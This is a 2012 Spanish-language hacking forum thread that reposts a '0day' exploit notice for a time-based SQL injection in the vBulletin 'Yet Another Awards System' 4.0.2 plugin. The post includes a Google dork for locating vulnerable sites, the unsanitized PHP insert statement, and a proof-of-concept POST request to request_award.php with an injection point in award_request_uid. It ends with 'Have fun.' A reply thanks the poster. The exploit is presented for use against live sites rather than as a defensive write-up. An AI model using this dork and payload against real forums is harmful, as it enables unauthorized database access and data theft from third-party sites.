comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

vBulletin 0day [Yet Another Awards System] SQL Injection

  • 1 Respuestas
  • 2171 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« en: Agosto 30, 2012, 05:35:52 pm »
Nueva vulnerabilidad que afecta los sistemas de Vbulletin en la version 4.0.2.

Recien salida del horno:

Código: Text
  1. # Exploit Title: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
  2. # Google Dork: inurl:awards.php intext:"powered by vbulletin"
  3. # Date: 29/08/12
  4. # Exploit Author: Backsl@sh/Dan
  5. # Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684
  6. # Version: 4.0.2+
  7.  
  8.  
  9.  
  10. The vulnerability exists within /request_award.php.
  11.  
  12. $vbulletin->input->clean_array_gpc('p', array(
  13.                         'award_id' => TYPE_UINT,
  14.                         //'award_request_name' => TYPE_STR,
  15.                         //'award_request_recipient_name' => TYPE_STR,
  16.                         'award_request_reason' => TYPE_STR,
  17.                         'award_request_uid' => TYPE_UNIT,
  18.         ));
  19.  
  20. > $award_request_uid = $vbulletin->GPC['award_request_uid'];
  21. > > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string
  22.  
  23. ($vbulletin->GPC['award_request_reason']) ."')");
  24.  
  25. $award_request_uid is used within an insert into statement, unsanitized.
  26.  
  27.  
  28. - POC -
  29. http://[site].com/request_award.php
  30. POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
  31.  
  32.  
  33. Thanks. Have fun.
  34.  
  35. http://www.bugabuse.net/

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #1 en: Agosto 30, 2012, 09:13:41 pm »
Gracias por Compartir!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!



SQL Injection - Joomla módulo "com_fireboard"

Iniciado por M5f3r0

Respuestas: 0
Vistas: 1818
Último mensaje Agosto 16, 2013, 01:43:18 am
por M5f3r0
[Curso] SQL Injection desde 0 - Union based y Blind Boolean Based.

Iniciado por M5f3r0

Respuestas: 8
Vistas: 9159
Último mensaje Abril 21, 2017, 04:36:34 am
por M5f3r0
Mysql injection avanzada: "doble query/error based"

Iniciado por q3rv0

Respuestas: 2
Vistas: 2599
Último mensaje Agosto 30, 2012, 04:26:01 am
por andrewtwo
Tecnicas de Blind Mysql Injection (Bit Shifting && Find_in_set())

Iniciado por q3rv0

Respuestas: 3
Vistas: 2329
Último mensaje Agosto 30, 2012, 12:50:52 am
por andrewtwo
HTML injection (Ataque y Defensa) [Practico] By 2Fac3R

Iniciado por 2Fac3R

Respuestas: 2
Vistas: 2128
Último mensaje Diciembre 28, 2012, 03:03:19 am
por 2Fac3R